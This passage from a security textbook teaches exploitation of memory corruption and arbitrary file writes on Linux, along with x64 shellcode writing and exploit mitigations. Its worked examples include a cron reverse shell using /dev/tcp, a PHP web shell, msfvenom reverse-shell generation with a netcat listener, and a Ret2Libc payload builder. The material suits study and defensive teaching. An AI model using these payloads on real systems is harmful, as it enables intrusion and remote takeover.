As an alternative to using an arbitrary free-list, you might use defined memory pools for different allocation sizes to group smaller allocations appropriately. For example, you might specify pools for allocations of 16, 64, 256, and 1024 bytes. When the request is made, the implementation will allocate the buffer based on the pool that most closely matches the size requested and is large enough to fit the allocation. For example, if you wanted a 50-byte allocation, it would go into the 64-byte pool, whereas a 512-byte allocation would go into the 1024-byte pool. Anything larger than 1024 bytes would be allocated using an alternative approach for large allocations. The use of sized memory pools reduces fragmentation caused by small allocations. As long as there’s a free entry for the requested memory in the sized pool, it will be satisfied, and larger allocations will not be blocked as much.
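The pool selection described above amounts to rounding each request up to the nearest pool size, with oversized requests falling through to a separate large-allocation path. A minimal sketch, using the pool sizes from the text:

```python
# Sized-pool selection: a request is served from the smallest pool
# large enough to hold it; anything above the largest pool is handled
# by a separate large-allocation strategy.
POOL_SIZES = [16, 64, 256, 1024]

def pool_for(request_size):
    for pool in POOL_SIZES:
        if request_size <= pool:
            return pool
    return None  # falls through to the large-allocation path
```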

Heap Memory Storage

The final topic to discuss in relation to heap implementations is how information like the free-list is stored in memory. There are two methods. In one method, metadata, such as block size and whether the state is free or allocated, is stored alongside the allocated memory, which is known as in-band. In the other, known as out-of-band, metadata is stored elsewhere in memory. The out-of-band method is in many ways easier to exploit because you don’t have to worry about restoring important metadata when corrupting contiguous memory blocks, and it’s especially useful when you don’t know what values to restore for the metadata to be valid.

Arbitrary Memory Write Vulnerability

Memory corruption vulnerabilities are often the easiest vulnerabilities to find through fuzzing, but they’re not the only kind, as mentioned in Chapter 9. The most interesting is an arbitrary file write resulting from incorrect resource handling. This incorrect handling of resources might be due to a command that allows you to directly specify the location of a file write or due to a command that has a path canonicalization vulnerability, allowing you to specify the location relative to the current directory. However the vulnerability manifests, it’s useful to know what you would need to write to the filesystem to get code execution.

The arbitrary writing of memory, although it might be a direct consequence of a mistake in the application’s implementation, could also occur as a by-product of another vulnerability, such as a heap buffer overflow. Many old heap memory allocators would use a linked list structure to store the list of free blocks; if this linked list data were corrupted, any modification of the free-list could result in an arbitrary write of a value into an attacker-supplied location.

To exploit an arbitrary memory write vulnerability, you need to modify a location that can directly control execution. For example, you could target the VTable pointer of an object in memory and overwrite it to gain control over execution, as in the methods for other corruption vulnerabilities.

One advantage of an arbitrary write is that it can lead to subverting the logic of an application. As an example, consider the networked application shown in Listing 10-7. When a connection is created, its logic allocates a memory structure to store important information about the connection, such as the network socket used and whether the user was authenticated as an administrator.

struct Session {
    int socket;
    int is_admin;
};

Session* session = WaitForConnection();

Listing 10-7: A simple connection session structure

For this example, we’ll assume that some code checks whether the session is an administrator session and, if so, allows certain tasks to be performed, such as changing the system’s configuration. There is a direct command to execute a local shell command if you’re authenticated as an administrator in the session, as shown in Listing 10-8.

Command c = ReadCommand(session->socket);
if (c.command == CMD_RUN_COMMAND
    && session->is_admin) {
  system(c.data);
}

Listing 10-8: Opening the run command as an administrator

By discovering the location of the session object in memory, you can change the is_admin value from 0 to 1, opening the run command for the attacker to gain control over the target system. We could also change the socket value to point to another file, causing the application to write data to an arbitrary file when writing a response, because in most Unix-like platforms, file descriptors and sockets are effectively the same type of resource. You can use the write system call to write to a file, just as you can to write to the socket.
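You can simulate the effect of such a write with Python’s ctypes. This is a simulation of the primitive, not an exploit: given the address of the session structure, a 4-byte write at the is_admin field’s offset flips the check.

```python
import ctypes

# Mirror of the Session structure from Listing 10-7.
class Session(ctypes.Structure):
    _fields_ = [("socket", ctypes.c_int),
                ("is_admin", ctypes.c_int)]

session = Session(socket=5, is_admin=0)

# Simulate an arbitrary 4-byte write: compute the address of the
# is_admin field and store 1 there, as an attacker's write primitive
# would do from outside the program's logic.
target = ctypes.addressof(session) + Session.is_admin.offset
ctypes.c_int.from_address(target).value = 1
```

After the write, the check in Listing 10-8 passes and the run command becomes available, even though the application never set is_admin itself.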

Although this is a contrived example, it should help you understand what happens in real-world networked applications. For any application that uses some sort of authentication to separate user and administrator responsibilities, you could typically subvert the security system in this way.

Exploiting High-Privileged File Writes

If an application is running with elevated privileges, such as root or administrator privileges, your options for exploiting an arbitrary file write are expansive. One technique is to overwrite executables or libraries that you know will get executed, such as the executable running the network service you’re exploiting. Many platforms provide other means of executing code, such as scheduled tasks, or cron jobs on Linux.

If you have high privileges, you can write your own cron jobs to a directory and execute them. On modern Linux systems, there’s usually a number of cron directories already inside /etc that you can write to, each with a suffix that indicates when the jobs will be executed. However, writing to these directories requires you to give the script file executable permissions. If your arbitrary file write only provides read and write permissions, you’ll need to write to /etc/cron.d with a Crontab file to execute arbitrary system commands. Listing 10-9 shows an example of a simple Crontab file that will run once a minute and connect a shell process to an arbitrary host and TCP port where you can access system commands.

* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'

Listing 10-9: A simple reverse shell Crontab file

This Crontab file must be written to /etc/cron.d/run_shell. Note that some versions of bash don’t support this reverse shell syntax, so you would have to use something else, such as a Python script, to achieve the same result. Now let’s look at how to exploit write vulnerabilities with low-privileged file writes.

Exploiting Low-Privileged File Writes

If you don’t have high privileges when a write occurs, all is not lost; however, your options are more limited, and you’ll still need to understand what is available on the system to exploit. For example, if you’re trying to exploit a web application or there’s a web server installed on the machine, it might be possible to drop a server-side rendered web page, which you can then access through the web server. Many web servers will also have PHP installed, which allows you to execute commands as the web server user and return the result of that command by writing the file shown in Listing 10-10 to the web root (it might be in /var/www/html or one of many other locations) with a .php extension.

<?php
if (isset($_REQUEST['exec'])) {
  $exec = $_REQUEST['exec'];
  $result = system($exec);
  echo $result;
}
?>

Listing 10-10: A simple PHP shell

After you’ve dropped this PHP shell to the web root, you can execute arbitrary commands on the system in the context of the web server by requesting a URL in the form http://server/shell.php?exec=CMD. The URL will result in the PHP code being executed on the server: the PHP shell will extract the exec parameter from the URL and pass it to the system API, with the result of executing the arbitrary command CMD.

Another advantage of PHP is that it doesn’t matter what else is in the file when it’s written: the PHP parser will look for the <?php … ?> tags and execute any PHP code within those tags regardless of whatever else is in the file. This is useful when you don’t have full control over what’s written to a file during the vulnerability exploitation.

Writing Shell Code

Now let’s look at how to start writing your own shell code. Using this shell code, you can execute arbitrary commands within the context of the application you’re exploiting with your discovered memory corruption vulnerability.

Writing your own shell code can be complex, and although I can’t do it full justice in the remainder of this chapter, I’ll give you some examples you can build on as you continue your own research into the subject. I’ll start with some basic techniques and challenges of writing x64 code using the Linux platform.

Getting Started

To start writing shell code, you need the following:

• An installation of Linux x64.

• A compiler; both GCC and CLANG are suitable.

• A copy of the Netwide Assembler (NASM); most Linux distributions have a package available for this.

On Debian and Ubuntu, the following command should install everything you need:

sudo apt-get install build-essential nasm

We’ll write the shell code in x64 assembly language and assemble it using nasm, a binary assembler. Assembling your shell code should result in a binary file containing just the machine instructions you specified. To test your shell code, you can use Listing 10-11, written in C, to act as a test harness.

test_shellcode.c

 #include <fcntl.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <unistd.h>

 typedef int (*exec_code_t)(void);

 int main(int argc, char** argv) {
   if (argc < 2) {
     printf("Usage: test_shellcode shellcode.bin\n");
     exit(1);
   }

   int fd = open(argv[1], O_RDONLY);
   if (fd <= 0) {
     perror("open");
     exit(1);
   }

   struct stat st;
   if (fstat(fd, &st) == -1) {
     perror("stat");
     exit(1);
   }

   exec_code_t shell = mmap(NULL, st.st_size,
       PROT_EXEC | PROT_READ, MAP_PRIVATE, fd, 0);

   if (shell == MAP_FAILED) {
     perror("mmap");
     exit(1);
   }

   printf("Mapped Address: %p\n", (void*)shell);
   printf("Shell Result: %d\n", shell());

   return 0;
 }

Listing 10-11: A shell code test harness

The code takes a path from the command line and then maps it into memory as a memory-mapped file. We specify that the code is executable with the PROT_EXEC flag; otherwise, various platform-level exploit mitigations could potentially stop the shell code from executing.

Compile the test code using the installed C compiler by executing the following command at the shell. You shouldn’t see any warnings during compilation.

$ cc -Wall -o test_shellcode test_shellcode.c

To test the code, put the following assembly code into the file shellcode.asm, as shown in Listing 10-12.

; Assemble as 64 bit
BITS 64
mov rax, 100
ret

Listing 10-12: A simple shell code example

The shell code in Listing 10-12 simply moves the value 100 to the RAX register. The RAX register is used as the return value for a function call. The test harness will call this shell code as if it were a function, so we would expect the value of the RAX register to be returned to the test harness. The shell code then immediately issues the ret instruction, jumping back to the caller of the shell code, which in this case is our test harness. The test harness should then print out the return value of 100, if successful.

Let’s try it out. First, we’ll need to assemble the shell code using nasm, and then we’ll execute it in the harness:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7fa51e860000
Shell Result: 100

The output returns 100 to the test harness, verifying that we’re successfully loading and executing the shell code. It’s also worth verifying that the assembled code in the resulting binary matches what we would expect. We can check this with the companion ndisasm tool, which disassembles this simple binary file without having to use a disassembler, such as IDA Pro. We need to use the -b 64 switch to ensure ndisasm uses 64-bit disassembly, as shown here:

$ ndisasm -b 64 shellcode.bin
00000000  B864000000        mov eax,0x64
00000005  C3                ret

The output from ndisasm should match up with the instructions we specified in the original shell code file in Listing 10-12. Notice that we used the RAX register in the mov instruction, but in the disassembler output we find the EAX register. The assembler uses this 32-bit register rather than a 64-bit register because it realizes that the constant 0x64 fits into a 32-bit constant, so it can use a shorter instruction rather than loading an entire 64-bit constant. This doesn’t change the behavior of the code because, when loading the constant into EAX, the processor will automatically set the upper 32 bits of the RAX register to zero. The BITS directive is also missing, because that is a directive for the nasm assembler to enable 64-bit support and is not needed in the final assembled output.

Simple Debugging Technique

Before you start writing more complicated shell code, let’s examine an easy debugging method. This is important when testing your full exploit, because it might not be easy to stop execution of the shell code at the exact location you want. We’ll add a breakpoint to our shell code using the int3 instruction so that when the associated code is called, any attached debugger will be notified.

Modify the code in Listing 10-12 as shown in Listing 10-13 to add the int3 breakpoint instruction and then rerun the nasm assembler.

; Assemble as 64 bit
BITS 64
int3
mov rax, 100
ret

Listing 10-13: A simple shell code example with a breakpoint

If you execute the test harness in a debugger, such as GDB, the output should be similar to Listing 10-14.

   $ gdb --args ./test_shellcode shellcode.bin
   GNU gdb 7.7.1
   ...
   (gdb) display/1i $rip
   (gdb) r
   Starting program: /home/user/test_shellcode shellcode.bin
   Mapped Address: 0x7fb6584f3000

Program received signal SIGTRAP, Trace/breakpoint trap.

   0x00007fb6584f3001 in ?? ()
   1: x/i $rip
=> 0x7fb6584f3001:      mov    $0x64,%eax
   (gdb) stepi
   0x00007fb6584f3006 in ?? ()
   1: x/i $rip
   => 0x7fb6584f3006:      retq
   (gdb)
   0x00000000004007f6 in main ()
   1: x/i $rip
   => 0x4007f6 <main+281>: mov    %eax,%esi

Listing 10-14: Setting a breakpoint on a shell

When we execute the test harness, the debugger stops on a SIGTRAP signal. The reason is that the processor has executed the int3 instruction, which acts as a breakpoint, resulting in the OS sending the SIGTRAP signal to the process that the debugger handles. Notice that when we print the instruction the program is currently running, it’s not the int3 instruction but instead the mov instruction immediately afterward. We don’t see the int3 instruction because the debugger has automatically skipped over it to allow the execution to continue.

Calling System Calls

The example shell code in Listing 10-12 only returns the value 100 to the caller, in this case our test harness, which is not very useful for exploiting a vulnerability; for that, we need the system to do some work for us. The easiest way to do that in shell code is to use the OS’s system calls. A system call is specified using a system call number defined by the OS. It allows you to call basic system functions, such as opening files and executing new processes.

Using system calls is easier than calling into system libraries because you don’t need to know the memory location of other executable code, such as the system C library. Not needing to know library locations makes your shell code simpler to write and more portable across different versions of the same OS.

However, there are downsides to using system calls: they generally implement much lower-level functionality than the system libraries, making them more complicated to call, as you’ll see. This is especially true on Windows, which has very complicated system calls. But for our purposes, a system call will be sufficient for demonstrating how to write your own shell code.

System calls have their own defined application binary interface (ABI) (see “Application Binary Interface” on page 123 for more details). In x64 Linux, you execute a system call using the following ABI:

• The number of the system call is placed in the RAX register.

• Up to six arguments can be passed into the system call in the registers RDI, RSI, RDX, R10, R8 and R9.

• The system call is issued using the syscall instruction.

• The result of the system call is stored in RAX after the syscall instruction returns.

For more information about the Linux system call process, run man 2 syscall on a Linux command line. This page contains a manual that describes the system call process and defines the ABI for various different architectures, including x86 and ARM. In addition, man 2 syscalls lists all the available system calls. You can also read the individual pages for a system call by running man 2 <SYSTEM CALL NAME>.
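You can observe this ABI from user space before writing any assembly: glibc’s syscall(2) wrapper takes the system call number first, followed by the arguments, mirroring the register convention above. The getpid system call number used here (39) is specific to Linux x86-64.

```python
import ctypes
import os

# glibc's syscall() wrapper mirrors the kernel ABI: the system call
# number goes first (RAX), then the arguments (RDI, RSI, ...).
libc = ctypes.CDLL(None, use_errno=True)

SYS_getpid = 39  # Linux x86-64 system call number for getpid
pid = libc.syscall(SYS_getpid)
```

The value returned by the raw system call matches what the higher-level os.getpid wrapper reports, confirming that the number and calling convention are correct.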

The exit System Call

To use a system call, we first need the system call number. Let’s use the exit system call as an example.

How do we find the number for a particular system call? Linux comes with header files, which define all the system call numbers for the current platform, but trying to find the right header file on disk can be like chasing your own tail. Instead, we’ll let the C compiler do the work for us. Compile the C code in Listing 10-15 and execute it to print the system call number of the exit system call.

#include <stdio.h>
#include <sys/syscall.h>

int main() {
  printf("Syscall: %d\n", SYS_exit);
  return 0;
}

Listing 10-15: Getting the system call number

On my system, the system call number for exit is 60, which is printed to my screen; yours may be different depending on the version of the Linux kernel you’re using, although the numbers don’t change very often. The exit system call takes the process exit code as its single argument, which is returned to the OS to indicate why the process exited. The Linux ABI specifies that the first parameter to a system call is passed in the RDI register, so we place the exit code there. The exit system call doesn’t return; instead, the process running the shell code is immediately terminated. Let’s implement the exit call. Assemble Listing 10-16 with nasm and run it inside the test harness.

BITS 64
; The syscall number of exit
mov rax, 60
; The exit code argument
mov rdi, 42
syscall

; exit should never return, but just in case.
ret

Listing 10-16: Calling the exit system call in shell code

When you run this shell code in the test harness, notice that the first print statement, which shows where the shell code was loaded, is still printed, but the subsequent print statement for the return value of the shell code is not. This indicates the shell code has successfully called the exit system call. To double-check this, you can display the exit code of the test harness in your shell, for example, by using echo $? in bash. The exit code should be 42, which is the value we moved into RDI.

The write System Call

Now let’s try calling write, a slightly more complicated system call that writes data to a file. Use the following syntax for the write system call:

ssize_t write(int fd, const void *buf, size_t count);

The fd argument is the file descriptor to write to; it holds an integer value identifying an open file. The buf argument points to the data to be written, and count specifies the number of bytes to write.
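Before implementing the call in assembly, you can confirm the argument order from Python, whose os.write is a thin wrapper over the same system call: it takes the file descriptor and the buffer, and returns the count of bytes written.

```python
import os

# os.write wraps the write system call: fd first, then the data
# buffer. The return value is the number of bytes actually written.
message = b"Hello User!\n"
written = os.write(1, message)  # 1 = standard output
```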

Using the code in Listing 10-17, we’ll pass the value 1 to the fd argument, which is the standard output for the console.

BITS 64

%define SYS_write 1
%define STDOUT 1

_start:
  mov rax, SYS_write
; The first argument (rdi) is the STDOUT file descriptor
  mov rdi, STDOUT
; The second argument (rsi) is a pointer to a string
  lea rsi, [_greeting]
; The third argument (rdx) is the length of the string to write
  mov rdx, _greeting_end - _greeting
; Execute the write system call
  syscall
  ret

_greeting:
  db "Hello User!", 10
_greeting_end:

Listing 10-17: Calling the write system call in shell code

By writing to standard output, we’ll print the data specified in buf to the console so we can see whether it worked. If successful, the string Hello User! should be printed to the shell console that the test harness is running on. The write system call should also return the number of bytes written to the file.

Now assemble Listing 10-17 with nasm and execute the binary in the test harness:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7f165ce1f000
Shell Result: -14

Instead of printing the Hello User! greeting we were expecting, we get a strange result, -14. Any value returning from the write system call that’s less than zero indicates an error. On Unix-like systems, including Linux, there’s a set of defined error numbers (abbreviated as errno). The error code is defined as positive in the system but returns as negative to indicate that it’s an error condition. You can look up the error code in the system C header files, but the short Python script in Listing 10-18 will do the work for us.

import errno
import os

# Specify the positive error number
err = 14
print(errno.errorcode[err])
# Prints 'EFAULT'
print(os.strerror(err))
# Prints 'Bad address'

Listing 10-18: A simple Python script to print error codes

Running the script will print the error code name as EFAULT and the string description as Bad address. This error code indicates that the system call tried to access some memory that was invalid, resulting in a memory fault. The only memory address we’re passing is the pointer to the greeting. Let’s look at the disassembly to find out whether the pointer we’re passing is at fault:

00000000  B801000000        mov rax,0x1
00000005  BF01000000        mov rdi,0x1
0000000A  488D34251A000000  lea rsi,[0x1a]
00000012  BA0C000000        mov rdx,0xc
00000017  0F05              syscall
00000019  C3                ret
0000001A  db "Hello User!", 10

Now we can see the problem with our code: the lea instruction, which loads the address to the greeting, is loading the absolute address 0x1A. But if you look at the test harness executions we’ve done so far, the address at which we load the executable code isn’t at 0x1A or anywhere close to it. This mismatch between the location where the shell code loads and the absolute addresses causes a problem. We can’t always determine in advance where the shell code will be loaded in memory, so we need a way of referencing the greeting relative to the current executing location. Let’s look at how to do this on 32-bit and 64-bit x86 processors.

Accessing the Relative Address on 32- and 64-Bit Systems

In 32-bit x86 mode, the simplest way of getting a relative address is to take advantage of the fact that the call instruction works with relative addresses. When a call instruction executes, it pushes the absolute address of the subsequent instruction onto the stack as a return address. We can use this absolute return address value to calculate where the current shell code is executing from and adjust the memory address of the greeting to match. For example, replace the lea instruction in Listing 10-17 with the following code:

call _get_rip
_get_rip:
; Pop return address off the stack
pop rsi
; Add relative offset from return to greeting
add rsi, _greeting - _get_rip

Using a relative call works well, but it massively complicates the code. Fortunately, the 64-bit instruction set introduced relative data addressing. We can access this in nasm by adding the rel keyword in front of an address. By changing the lea instruction as follows, we can access the address of the greeting relative to the current executing instruction:

lea rsi, [rel _greeting]

Now we can reassemble our shell code with these changes, and the message should print successfully:

$ nasm -f bin -o shellcode.bin shellcode.asm
$ ./test_shellcode shellcode.bin
Mapped Address: 0x7f165dedf000
Hello User!
Shell Result: 12

Executing Other Programs

Let’s wrap up our overview of system calls by executing another binary using the execve system call. Executing another binary is a common technique for getting execution on a target system that doesn’t require long, complicated shell code. The execve system call takes three parameters: the path to the program to run, an array of command line arguments with the array terminated by NULL, and an array of environment variables terminated by NULL. Calling execve requires a bit more work than calling simple system calls, such as write, because we need to build the arrays on the stack; however, it’s not that hard. Listing 10-19 executes the uname command by passing it the -a argument.

execve.asm

 BITS 64

 %define SYS_execve 59

 _start:
   mov rax, SYS_execve
 ; Load the executable path
lea rdi, [rel _exec_path]
 ; Load the argument
   lea rsi, [rel _argument]
 ; Build argument array on stack = { _exec_path, _argument, NULL }
push 0
   push rsi
   push rdi
mov rsi, rsp
 ; Build environment array on stack = { NULL }
   push 0
mov rdx, rsp
syscall
 ; execve shouldn't return, but just in case
   ret

 _exec_path:
   db "/bin/uname", 0
 _argument:
   db "-a", 0

Listing 10-19: Executing an arbitrary executable in shell code

The shell code in Listing 10-19 is complex, so let’s break it down step-by-step. First, the addresses of the two strings, "/bin/uname" and "-a", are loaded into registers. The two string addresses, along with the array’s terminating NULL (represented by a 0), are then pushed onto the stack in reverse order. The code copies the current address of the stack into the RSI register, which is the second argument to the system call. Next, a single NULL is pushed onto the stack for the environment array, and the resulting stack address is copied into the RDX register, which is the third argument to the system call. The RDI register already contains the address of the "/bin/uname" string, so our shell code does not need to reload the address before making the system call. Finally, we execute the execve system call, which performs the equivalent of the following C code:

char* args[] = { "/bin/uname",  "-a", NULL };
char* envp[] = { NULL };
execve("/bin/uname", args, envp);

If you assemble the execve shell code, you should see output similar to the following, where the command line /bin/uname -a is executed:

$ nasm -f bin -o execve.bin execve.asm
$ ./test_shellcode execve.bin

Mapped Address: 0x7fbdc3c1e000
Linux foobar 4.4.0 Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux

Generating Shell Code with Metasploit

It’s worth practicing writing your own shell code to gain a deeper understanding of it. However, because people have been writing shell code for a long time, a wide range of shell code to use for different platforms and purposes is already available online.

The Metasploit project is one useful repository of shell code. Metasploit gives you the option of generating shell code as a binary blob, which you can easily plug into your own exploit. Using Metasploit has many advantages:

• Handling encoding of the shell code by removing banned characters or formatting to avoid detection

• Supporting many different methods of gaining execution, including simple reverse shell and executing new binaries

• Supporting multiple platforms (including Linux, Windows, and macOS) as well as multiple architectures (such as x86, x64, and ARM)

I won’t explain in great detail how to build Metasploit modules or use their staged shell code, which requires the use of the Metasploit console to interact with the target. Instead, I’ll use a simple example of a reverse TCP shell to show you how to generate shell code using Metasploit. (Recall that a reverse TCP shell allows the target machine to communicate with the attacker’s machine via a listening port, which the attacker can use to gain execution.)

Accessing Metasploit Payloads

The msfvenom command line utility comes with a Metasploit installation, which provides access to the various shell code payloads built into Metasploit. We can list the payloads supported for x64 Linux using the -l option and filtering the output:

# msfvenom -l | grep linux/x64
--snip--
linux/x64/shell_bind_tcp    Listen for a connection and spawn a command shell
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell

We’ll use two shell codes:

shell_bind_tcp Binds to a TCP port and opens a local shell when connected to it

shell_reverse_tcp Attempts to connect back to your machine with a shell attached

Both of these payloads should work with a simple tool, such as Netcat, by either connecting to the target system or listening on the local system.

Building a Reverse Shell

When generating the shell code, you must specify the listening port (for bind and reverse shell) and the listening IP (for reverse shell, this is your machine’s IP address). These options are specified by passing LPORT=port and LHOST=IP, respectively. We’ll use the following code to build a reverse TCP shell, which will connect to the host 172.21.21.1 on TCP port 4444:

# msfvenom -p linux/x64/shell_reverse_tcp -f raw LHOST=172.21.21.1 \
           LPORT=4444 > msf_shellcode.bin

The msfvenom tool outputs the shell code to standard output by default, so you’ll need to pipe it to a file; otherwise, it will just print to the console and be lost. We also need to specify the -f raw flag to output the shell code as a raw binary blob. There are other potential options as well. For example, you can output the shell code to a small .elf executable, which you can run directly for testing. Because we have a test harness, we won’t need to do that.

Executing the Payload

To execute the payload, we need to set up an instance of netcat listening on port 4444 (for example, nc -l 4444). It’s possible that you won’t see a prompt when the connection is made. However, typing the id command should echo back the result:

$ nc -l 4444
# Wait for connection
id
uid=1000(user) gid=1000(user) groups=1000(user)

The result shows that the shell successfully executed the id command on the system the shell code is running on and printed the user and group IDs from the system. You can use a similar payload on Windows, macOS, and even Solaris. It might be worthwhile to explore the various options in msfvenom on your own.

Memory Corruption Exploit Mitigations

In “Exploiting Memory Corruption Vulnerabilities” on page 246, I alluded to exploit mitigations and how they make exploiting memory vulnerabilities difficult. The truth is that exploiting a memory corruption vulnerability on most modern platforms can be quite complicated due to exploit mitigations added to the compilers (and the generated application) as well as to the OS.

Security vulnerabilities seem to be an inevitable part of software development, as do significant chunks of source code written in memory-unsafe languages that are not updated for long periods of time. Therefore, it’s unlikely that memory corruption vulnerabilities will disappear overnight.

Instead of trying to fix all these vulnerabilities, developers have implemented clever techniques to mitigate the impact of known security weaknesses. Specifically, these techniques aim to make exploitation of memory corruption vulnerabilities difficult or, ideally, impossible. In this section, I’ll describe some of the exploit mitigation techniques used in contemporary platforms and development tools that make it more difficult for attackers to exploit these vulnerabilities.

Data Execution Prevention

As you saw earlier, one of the main aims when developing an exploit is to gain control of the instruction pointer. In my previous explanation, I glossed over problems that might occur when placing your shell code in memory and executing it. On modern platforms, you’re unlikely to be able to execute arbitrary shell code as easily as described earlier due to Data Execution Prevention (DEP) or No-Execute (NX) mitigation.

DEP attempts to mitigate memory corruption exploitation by requiring memory with executable instructions to be specially allocated by the OS. This requires processor support so that if the process tries to execute memory at an address that’s not marked as executable, the processor raises an error. The OS then terminates the process in error to prevent further execution.

The error resulting from executing nonexecutable memory can be hard to spot and look confusing at first. Almost all platforms misreport the error as Segmentation fault or Access violation on what looks like potentially legitimate code. You might mistake this error for the instruction’s attempt to access invalid memory. Due to this confusion, you might spend time debugging your code to figure out why your shell code isn’t executing correctly, believing it to be a bug in your code when it’s actually DEP being triggered. For example, Listing 10-20 shows an example of a DEP crash.

GNU gdb 7.7.1
(gdb) r
Starting program: /home/user/triage/dep

Program received signal SIGSEGV, Segmentation fault.
0xbffff730 in ?? ()

(gdb) x/3i $pc
=> 0xbffff730:  push   $0x2a
   0xbffff732:  pop    %eax
   0xbffff733:  ret

Listing 10-20: An example crash from executing nonexecutable memory

It’s tricky to determine the source of this crash. At first glance, you might think it’s due to an invalid stack pointer, because the push instruction would result in the same error. Only by looking at where the instruction is located can you discover it was executing nonexecutable memory. You can determine whether it’s in executable memory by using the memory map commands described in Table 10-8.

DEP is very effective in many cases at preventing easy exploitation of memory corruption vulnerabilities, because it’s easy for a platform developer to limit executable memory to specific executable modules, leaving areas like the heap or stack nonexecutable. However, limiting executable memory in this way does require hardware and software support, leaving software vulnerable due to human error. For example, when exploiting a simple network-connected device, it might be that the developers haven’t bothered to enable DEP or that the hardware they’re using doesn’t support it.

If DEP is enabled, you can use the return-oriented programming method as a workaround.

Return-Oriented Programming Counter-Exploit

The development of the return-oriented programming (ROP) technique was in direct response to the increase in platforms equipped with DEP. ROP is a simple technique that repurposes existing, already executable instructions rather than injecting arbitrary instructions into memory and executing them. Let’s look at a simple example of a stack memory corruption exploit using this technique.

On Unix-like platforms, the C library, which provides the basic API for applications such as opening files, also has functions that allow you to start a new process by passing the command line in program code. The system() function is such a function and has the following syntax:

int system(const char *command);

The function takes a simple command string, which represents the program to run and the command line arguments. This command string is passed to the command interpreter, which we’ll come back to later. For now, know that if you write the following in a C application, it executes the ls application in the shell:

system("ls");

If we know the address of the system API in memory, we can redirect the instruction pointer to the start of the API’s instructions; in addition, if we can influence the parameter in memory, we can start a new process under our control. Calling the system API allows you to bypass DEP because, as far as the processor and platform are concerned, you’re executing legitimate instructions in memory marked as executable. Figure 10-8 shows this process in more detail.

In this very simple visualization, ROP executes a function provided by the C library (libc) to bypass DEP. This technique, specifically called Ret2Libc, laid the foundation of ROP as we know it today. You can generalize this technique to write almost any program using ROP, for example, to implement a full Turing complete system entirely by manipulating the stack.

image

Figure 10-8: A simple ROP to call the system API
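To make Figure 10-8 concrete, the stack layout for a Ret2Libc call can be sketched as a payload-building script. All addresses below are hypothetical placeholders; in a real exploit, they would come from the target’s libc and memory layout:

```python
import struct

# Hypothetical addresses -- real values depend on the target process.
SYSTEM_ADDR = 0xF7E4C850   # assumed address of system() in libc
EXIT_ADDR = 0xF7E3F5B0     # assumed address of exit(), used as system()'s return
CMD_ADDR = 0xFFFFD000      # assumed address of a "/bin/sh" string we control
BUFFER_LEN = 64            # bytes from buffer start to the saved return address

def build_ret2libc_payload():
    # Fill the buffer up to the saved return address...
    payload = b"A" * BUFFER_LEN
    # ...overwrite the return address with system()'s address...
    payload += struct.pack("<I", SYSTEM_ADDR)
    # ...then lay out system()'s own frame: a return address for it,
    # followed by its single argument, the command string pointer.
    payload += struct.pack("<I", EXIT_ADDR)
    payload += struct.pack("<I", CMD_ADDR)
    return payload

payload = build_ret2libc_payload()
```

When the vulnerable function returns, it "returns" into system() with the stack arranged exactly as if a legitimate caller had invoked it.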

The key to understanding ROP is to know that a sequence of instructions doesn’t have to execute as it was originally compiled into the program’s executable code. This means you can take small snippets of code throughout the program or in other executable code, such as libraries, and repurpose them to perform actions the developers didn’t originally intend to execute. These small sequences of instructions that perform some useful function are called ROP gadgets. Figure 10-9 shows a more complex ROP example that opens a file and then writes a data buffer to the file.

image

Figure 10-9: A more complex ROP calling open and then writing to the file by using a couple of gadgets

Because the value of the file descriptor returning from open probably can’t be known ahead of time, this task would be more difficult to do using the simpler Ret2Libc technique.

Populating the stack with the correct sequence of operations to execute as ROP is easy if you have a stack buffer overflow. But what if you only have some other method of gaining the initial code execution, such as a heap buffer overflow? In this case, you’ll need a stack pivot, which is a ROP gadget that allows you to set the current stack pointer to a known value. For example, if after the exploit EAX points to a memory buffer you control (perhaps it’s a VTable pointer), you can gain control over the stack pointer and execute your ROP chain using a gadget that looks like Listing 10-21.

xchg esp, eax # Exchange the EAX and ESP registers
ret           # Return, will execute address on new stack

Listing 10-21: Gaining execution using a ROP gadget

The gadget shown in Listing 10-21 exchanges the values of the EAX and ESP registers; ESP indexes the stack in memory. Because we control the value of EAX, we can pivot the stack location to a set of operations we control (such as in Figure 10-9), which will execute our ROP.
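Finding a gadget like Listing 10-21 in a binary amounts to a byte-pattern search over its executable sections. Here’s a minimal sketch: in 32-bit x86 encoding, xchg esp, eax is the single byte 0x94 and ret is 0xC3:

```python
# The two-byte stack-pivot gadget "xchg esp, eax; ret"
# in 32-bit x86 encoding.
GADGET = b"\x94\xc3"

def find_gadgets(code, pattern=GADGET):
    """Return every offset at which the gadget bytes appear."""
    offsets = []
    start = 0
    while True:
        idx = code.find(pattern, start)
        if idx == -1:
            return offsets
        offsets.append(idx)
        start = idx + 1

# Example: a fake code blob with the gadget embedded at offset 3.
blob = b"\x90\x90\x90\x94\xc3\x90"
print(find_gadgets(blob))  # [3]
```

Real gadget-finding tools search for many such patterns at once, including unintended instruction sequences that start in the middle of longer instructions.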

Unfortunately, using ROP to get around DEP is not without problems. Let’s look at some ROP limitations and how to deal with them.

Address Space Layout Randomization (ASLR)

Using ROP to bypass DEP creates a couple of problems. First, you need to know the location of the system functions or ROP gadgets you’re trying to execute. Second, you need to know the location of the stack or other memory locations to use as data. However, finding locations wasn’t always a limiting factor.

When DEP was first introduced into Windows XP SP2, all system binaries and the main executable file were mapped at consistent locations, at least for a given update revision and language. (This is why earlier Metasploit modules required you to specify a language.) In addition, the operation of the heap and the locations of thread stacks were almost completely predictable. Therefore, on XP SP2 it was easy to circumvent DEP, because you could guess the locations of all the various components you might need to execute your ROP chain.

Memory Information Disclosure Vulnerabilities

With the introduction of Address Space Layout Randomization (ASLR), bypassing DEP became more difficult. As its name suggests, the goal of this mitigation method is to randomize the layout of a process’s address space to make it harder for an attacker to predict. Let’s look at a couple of ways that an exploit can bypass the protections provided by ASLR.

Before ASLR, information disclosure vulnerabilities were typically useful for circumventing an application’s security by allowing access to protected information in memory, such as passwords. These types of vulnerabilities have found a new use: revealing the layout of the address space to counter randomization by ASLR.

